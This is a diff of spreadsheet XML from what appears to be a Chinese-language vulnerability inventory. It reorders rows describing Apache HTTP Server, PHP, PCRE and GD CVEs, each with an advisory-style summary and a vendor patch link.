+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E300" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
-https://httpd.apache.org/download.cgi</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://httpd.apache.org/download.cgi#apache24</t>
         </is>
       </c>
       <c r="F300" t="inlineStr">
         <is>
-          <t>当提供非常大的输入缓冲区时，Apache HTTP Server 2.4.53 和更早版本可能会由于 ap_strcmp_match() 中的读取超出范围而崩溃或泄露信息。虽然不能将随服务器分发的任何代码强制执行此类调用，但假设使用 ap_strcmp_match() 的第三方模块或 lua 脚本可能会受到影响。</t>
+          <t>Apache HTTP Server是阿帕奇（Apache）基金会的一款开源网页服务器。
+Apache HTTP Server存在缓冲区溢出漏洞，由于 mod_lua 解析 multipart 内容时可能出现缓冲区溢出，攻击者利用该漏洞可通过精心设计的HTTP请求进行缓冲区溢出攻击。</t>
         </is>
       </c>
       <c r="G300" t="inlineStr">
@@ -36912,7 +36913,7 @@
       </c>
       <c r="J300" t="inlineStr">
         <is>
-          <t>CVE-2022-28615</t>
+          <t>CVE-2021-44790</t>
         </is>
       </c>
       <c r="K300" t="inlineStr">
@@ -36987,7 +36988,7 @@
     <row r="301">
       <c r="A301" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 缓冲区溢出漏洞(CVE-2021-44790)</t>
+          <t>Apache HTTP Server 输入验证错误漏洞(CVE-2022-28615)</t>
         </is>
       </c>
       <c r="B301" t="inlineStr">
@@ -37002,19 +37003,18 @@
       </c>
       <c r="D301" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Out Of Bounds Array Access Vulnerability</t>
         </is>
       </c>
       <c r="E301" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-https://httpd.apache.org/download.cgi#apache24</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
+https://httpd.apache.org/download.cgi</t>
         </is>
       </c>
       <c r="F301" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是阿帕奇（Apache）基金会的一款开源网页服务器。
-Apache HTTP Server存在缓冲区溢出漏洞，由于 mod_lua 解析 multipart 内容时可能出现缓冲区溢出，攻击者利用该漏洞可通过精心设计的HTTP请求进行缓冲区溢出攻击。</t>
+          <t>当提供非常大的输入缓冲区时，Apache HTTP Server 2.4.53 和更早版本可能会由于 ap_strcmp_match() 中的读取超出范围而崩溃或泄露信息。虽然不能将随服务器分发的任何代码强制执行此类调用，但假设使用 ap_strcmp_match() 的第三方模块或 lua 脚本可能会受到影响。</t>
         </is>
       </c>
       <c r="G301" t="inlineStr">
@@ -37034,7 +37034,7 @@
       </c>
       <c r="J301" t="inlineStr">
         <is>
-          <t>CVE-2021-44790</t>
+          <t>CVE-2022-28615</t>
         </is>
       </c>
       <c r="K301" t="inlineStr">
@@ -38192,7 +38192,7 @@
     <row r="311">
       <c r="A311" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8391)</t>
+          <t>PHP 安全漏洞(CVE-2015-8390)</t>
         </is>
       </c>
       <c r="B311" t="inlineStr">
@@ -38218,7 +38218,7 @@
       </c>
       <c r="F311" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
         </is>
       </c>
       <c r="G311" t="inlineStr"/>
@@ -38234,7 +38234,7 @@
       </c>
       <c r="J311" t="inlineStr">
         <is>
-          <t>CVE-2015-8391</t>
+          <t>CVE-2015-8390</t>
         </is>
       </c>
       <c r="K311" t="inlineStr">
@@ -38309,7 +38309,7 @@
     <row r="312">
       <c r="A312" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8390)</t>
+          <t>PHP 安全漏洞(CVE-2015-8391)</t>
         </is>
       </c>
       <c r="B312" t="inlineStr">
@@ -38335,7 +38335,7 @@
       </c>
       <c r="F312" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
         </is>
       </c>
       <c r="G312" t="inlineStr"/>
@@ -38351,7 +38351,7 @@
       </c>
       <c r="J312" t="inlineStr">
         <is>
-          <t>CVE-2015-8390</t>
+          <t>CVE-2015-8391</t>
         </is>
       </c>
       <c r="K312" t="inlineStr">
@@ -39143,7 +39143,7 @@
     <row r="319">
       <c r="A319" t="inlineStr">
         <is>
-          <t>PHP拒绝服务漏洞(CVE-2016-6294)</t>
+          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
         </is>
       </c>
       <c r="B319" t="inlineStr">
@@ -39168,7 +39168,7 @@
       </c>
       <c r="F319" t="inlineStr">
         <is>
-          <t>PHP中ext / intl / locale / locale_methods.c中ext/intl/locale/locale_methods.c中的locale_accept_from_http函数不能正确限制对ICU uloc_acceptLanguageFromHTTP函数的调用，该函数允许远程访问攻击者通过长参数调用导致拒绝服务（越界读取）或可能产生未指定的其他影响。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G319" t="inlineStr">
@@ -39188,7 +39188,7 @@
       </c>
       <c r="J319" t="inlineStr">
         <is>
-          <t>CVE-2016-6294</t>
+          <t>CVE-2016-6295</t>
         </is>
       </c>
       <c r="K319" t="inlineStr">
@@ -39263,7 +39263,7 @@
     <row r="320">
       <c r="A320" t="inlineStr">
         <is>
-          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
+          <t>PHP拒绝服务漏洞(CVE-2016-6294)</t>
         </is>
       </c>
       <c r="B320" t="inlineStr">
@@ -39288,7 +39288,7 @@
       </c>
       <c r="F320" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP中ext / intl / locale / locale_methods.c中ext/intl/locale/locale_methods.c中的locale_accept_from_http函数不能正确限制对ICU uloc_acceptLanguageFromHTTP函数的调用，该函数允许远程访问攻击者通过长参数调用导致拒绝服务（越界读取）或可能产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G320" t="inlineStr">
@@ -39308,7 +39308,7 @@
       </c>
       <c r="J320" t="inlineStr">
         <is>
-          <t>CVE-2016-6295</t>
+          <t>CVE-2016-6294</t>
         </is>
       </c>
       <c r="K320" t="inlineStr">
@@ -41425,7 +41425,7 @@
     <row r="338">
       <c r="A338" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
+          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
         </is>
       </c>
       <c r="B338" t="inlineStr">
@@ -41440,18 +41440,18 @@
       </c>
       <c r="D338" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Information Disclosure</t>
         </is>
       </c>
       <c r="E338" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+http://www.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F338" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
+          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G338" t="inlineStr">
@@ -41471,7 +41471,7 @@
       </c>
       <c r="J338" t="inlineStr">
         <is>
-          <t>CVE-2016-4073</t>
+          <t>CVE-2016-7127</t>
         </is>
       </c>
       <c r="K338" t="inlineStr">
@@ -41546,7 +41546,7 @@
     <row r="339">
       <c r="A339" t="inlineStr">
         <is>
-          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
         </is>
       </c>
       <c r="B339" t="inlineStr">
@@ -41561,18 +41561,18 @@
       </c>
       <c r="D339" t="inlineStr">
         <is>
-          <t>Information Disclosure</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E339" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
-http://www.php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
         </is>
       </c>
       <c r="F339" t="inlineStr">
         <is>
-          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
         </is>
       </c>
       <c r="G339" t="inlineStr">
@@ -41592,7 +41592,7 @@
       </c>
       <c r="J339" t="inlineStr">
         <is>
-          <t>CVE-2016-7127</t>
+          <t>CVE-2016-4073</t>
         </is>
       </c>
       <c r="K339" t="inlineStr">
@@ -41667,7 +41667,7 @@
     <row r="340">
       <c r="A340" t="inlineStr">
         <is>
-          <t>PHP 拒绝服务漏洞(CVE-2016-7414)</t>
+          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
         </is>
       </c>
       <c r="B340" t="inlineStr">
@@ -41687,13 +41687,12 @@
       </c>
       <c r="E340" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F340" t="inlineStr">
         <is>
-          <t>PHP 5.6.26之前的ZIP签名验证功能和7.0.11之前的7.x不能确保uncompressed_filesize字段足够大，这使远程攻击者可以拒绝服务（越界内存访问）或通过精心制作的PHAR存档（与ext/phar/util.c和ext/phar/zip.c有关）具有其他未指定的影响。</t>
+          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
         </is>
       </c>
       <c r="G340" t="inlineStr">
@@ -41713,7 +41712,7 @@
       </c>
       <c r="J340" t="inlineStr">
         <is>
-          <t>CVE-2016-7414</t>
+          <t>CVE-2016-7417</t>
         </is>
       </c>
       <c r="K340" t="inlineStr">
@@ -41788,7 +41787,7 @@
     <row r="341">
       <c r="A341" t="inlineStr">
         <is>
-          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
+          <t>PHP 拒绝服务漏洞(CVE-2016-7414)</t>
         </is>
       </c>
       <c r="B341" t="inlineStr">
@@ -41808,12 +41807,13 @@
       </c>
       <c r="E341" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F341" t="inlineStr">
         <is>
-          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
+          <t>PHP 5.6.26之前的ZIP签名验证功能和7.0.11之前的7.x不能确保uncompressed_filesize字段足够大，这使远程攻击者可以拒绝服务（越界内存访问）或通过精心制作的PHAR存档（与ext/phar/util.c和ext/phar/zip.c有关）具有其他未指定的影响。</t>
         </is>
       </c>
       <c r="G341" t="inlineStr">
@@ -41833,7 +41833,7 @@
       </c>
       <c r="J341" t="inlineStr">
         <is>
-          <t>CVE-2016-7411</t>
+          <t>CVE-2016-7414</t>
         </is>
       </c>
       <c r="K341" t="inlineStr">
@@ -41908,7 +41908,7 @@
     <row r="342">
       <c r="A342" t="inlineStr">
         <is>
-          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
+          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
         </is>
       </c>
       <c r="B342" t="inlineStr">
@@ -41933,7 +41933,7 @@
       </c>
       <c r="F342" t="inlineStr">
         <is>
-          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
+          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
         </is>
       </c>
       <c r="G342" t="inlineStr">
@@ -41953,7 +41953,7 @@
       </c>
       <c r="J342" t="inlineStr">
         <is>
-          <t>CVE-2016-7417</t>
+          <t>CVE-2016-7411</t>
         </is>
       </c>
       <c r="K342" t="inlineStr">
@@ -43113,7 +43113,7 @@
     <row r="352">
       <c r="A352" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
+          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
         </is>
       </c>
       <c r="B352" t="inlineStr">
@@ -43128,17 +43128,17 @@
       </c>
       <c r="D352" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E352" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
         </is>
       </c>
       <c r="F352" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
+          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
         </is>
       </c>
       <c r="G352" t="inlineStr">
@@ -43158,7 +43158,7 @@
       </c>
       <c r="J352" t="inlineStr">
         <is>
-          <t>CVE-2016-3078</t>
+          <t>CVE-2016-3074</t>
         </is>
       </c>
       <c r="K352" t="inlineStr">
@@ -43233,7 +43233,7 @@
     <row r="353">
       <c r="A353" t="inlineStr">
         <is>
-          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
         </is>
       </c>
       <c r="B353" t="inlineStr">
@@ -43248,17 +43248,17 @@
       </c>
       <c r="D353" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E353" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
         </is>
       </c>
       <c r="F353" t="inlineStr">
         <is>
-          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G353" t="inlineStr">
@@ -43278,7 +43278,7 @@
       </c>
       <c r="J353" t="inlineStr">
         <is>
-          <t>CVE-2016-3074</t>
+          <t>CVE-2016-3078</t>
         </is>
       </c>
       <c r="K353" t="inlineStr">
@@ -43953,7 +43953,7 @@
     <row r="359">
       <c r="A359" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2019-9023)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2019-9021)</t>
         </is>
       </c>
       <c r="B359" t="inlineStr">
@@ -43973,12 +43973,12 @@
       </c>
       <c r="E359" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77247</t>
         </is>
       </c>
       <c r="F359" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的mbstring正则表达式函数存在缓冲区溢出漏洞。攻击者可借助无效的多字节数据利用该漏洞造成内存损坏/泄露。以下版本受到影响：PHP 5.6.40之前版本，7.1.26之前的7.x版本，7.2.14之前的7.2.x版本，7.3.1之前的7.3.x版本。</t>
+          <t>在PHP 5.6.40之前，7.1.26之前的7.x，7.2.14之前的7.2.x和7.3.1之前的7.3.x中发现了一个问题。PHAR扩展中PHAR读取功能中基于堆的缓冲区超量读取可能会允许攻击者在尝试解析文件名时读取超出实际数据的已分配或未分配内存，这是与CVE-2018-20783不同的漏洞。这与ext/phar/phar.c中的phar_detect_phar_fname_ext有关。</t>
         </is>
       </c>
       <c r="G359" t="inlineStr">
@@ -43998,7 +43998,7 @@
       </c>
       <c r="J359" t="inlineStr">
         <is>
-          <t>CVE-2019-9023</t>
+          <t>CVE-2019-9021</t>
         </is>
       </c>
       <c r="K359" t="inlineStr">
@@ -44073,7 +44073,7 @@
     <row r="360">
       <c r="A360" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2019-9021)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2019-9023)</t>
         </is>
       </c>
       <c r="B360" t="inlineStr">
@@ -44093,12 +44093,12 @@
       </c>
       <c r="E360" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77247</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/</t>
         </is>
       </c>
       <c r="F360" t="inlineStr">
         <is>
-          <t>在PHP 5.6.40之前，7.1.26之前的7.x，7.2.14之前的7.2.x和7.3.1之前的7.3.x中发现了一个问题。PHAR扩展中PHAR读取功能中基于堆的缓冲区超量读取可能会允许攻击者在尝试解析文件名时读取超出实际数据的已分配或未分配内存，这是与CVE-2018-20783不同的漏洞。这与ext/phar/phar.c中的phar_detect_phar_fname_ext有关。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的mbstring正则表达式函数存在缓冲区溢出漏洞。攻击者可借助无效的多字节数据利用该漏洞造成内存损坏/泄露。以下版本受到影响：PHP 5.6.40之前版本，7.1.26之前的7.x版本，7.2.14之前的7.2.x版本，7.3.1之前的7.3.x版本。</t>
         </is>
       </c>
       <c r="G360" t="inlineStr">
@@ -44118,7 +44118,7 @@
       </c>
       <c r="J360" t="inlineStr">
         <is>
-          <t>CVE-2019-9021</t>
+          <t>CVE-2019-9023</t>
         </is>
       </c>
       <c r="K360" t="inlineStr">
@@ -44674,7 +44674,7 @@
     <row r="365">
       <c r="A365" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8391)</t>
+          <t>PHP 安全漏洞(CVE-2015-8389)</t>
         </is>
       </c>
       <c r="B365" t="inlineStr">
@@ -44700,7 +44700,7 @@
       </c>
       <c r="F365" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理‘/(?：|a|){100}x/’模式和相关模式。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（无限递归）。PHP 引用这个底层组件。</t>
         </is>
       </c>
       <c r="G365" t="inlineStr"/>
@@ -44716,7 +44716,7 @@
       </c>
       <c r="J365" t="inlineStr">
         <is>
-          <t>CVE-2015-8391</t>
+          <t>CVE-2015-8389</t>
         </is>
       </c>
       <c r="K365" t="inlineStr">
@@ -44791,7 +44791,7 @@
     <row r="366">
       <c r="A366" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8390)</t>
+          <t>PHP 安全漏洞(CVE-2015-8391)</t>
         </is>
       </c>
       <c r="B366" t="inlineStr">
@@ -44817,7 +44817,7 @@
       </c>
       <c r="F366" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
         </is>
       </c>
       <c r="G366" t="inlineStr"/>
@@ -44833,7 +44833,7 @@
       </c>
       <c r="J366" t="inlineStr">
         <is>
-          <t>CVE-2015-8390</t>
+          <t>CVE-2015-8391</t>
         </is>
       </c>
       <c r="K366" t="inlineStr">
@@ -44908,7 +44908,7 @@
     <row r="367">
       <c r="A367" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8389)</t>
+          <t>PHP 安全漏洞(CVE-2015-8390)</t>
         </is>
       </c>
       <c r="B367" t="inlineStr">
@@ -44934,7 +44934,7 @@
       </c>
       <c r="F367" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理‘/(?：|a|){100}x/’模式和相关模式。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（无限递归）。PHP 引用这个底层组件。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
         </is>
       </c>
       <c r="G367" t="inlineStr"/>
@@ -44950,7 +44950,7 @@
       </c>
       <c r="J367" t="inlineStr">
         <is>
-          <t>CVE-2015-8389</t>
+          <t>CVE-2015-8390</t>
         </is>
       </c>
       <c r="K367" t="inlineStr">
@@ -45625,7 +45625,7 @@
     <row r="373">
       <c r="A373" t="inlineStr">
         <is>
-          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
+          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
         </is>
       </c>
       <c r="B373" t="inlineStr">
@@ -45640,7 +45640,7 @@
       </c>
       <c r="D373" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E373" t="inlineStr">
@@ -45650,7 +45650,7 @@
       </c>
       <c r="F373" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G373" t="inlineStr">
@@ -45670,7 +45670,7 @@
       </c>
       <c r="J373" t="inlineStr">
         <is>
-          <t>CVE-2016-6295</t>
+          <t>CVE-2016-6296</t>
         </is>
       </c>
       <c r="K373" t="inlineStr">
@@ -45745,7 +45745,7 @@
     <row r="374">
       <c r="A374" t="inlineStr">
         <is>
-          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
+          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
         </is>
       </c>
       <c r="B374" t="inlineStr">
@@ -45760,7 +45760,7 @@
       </c>
       <c r="D374" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E374" t="inlineStr">
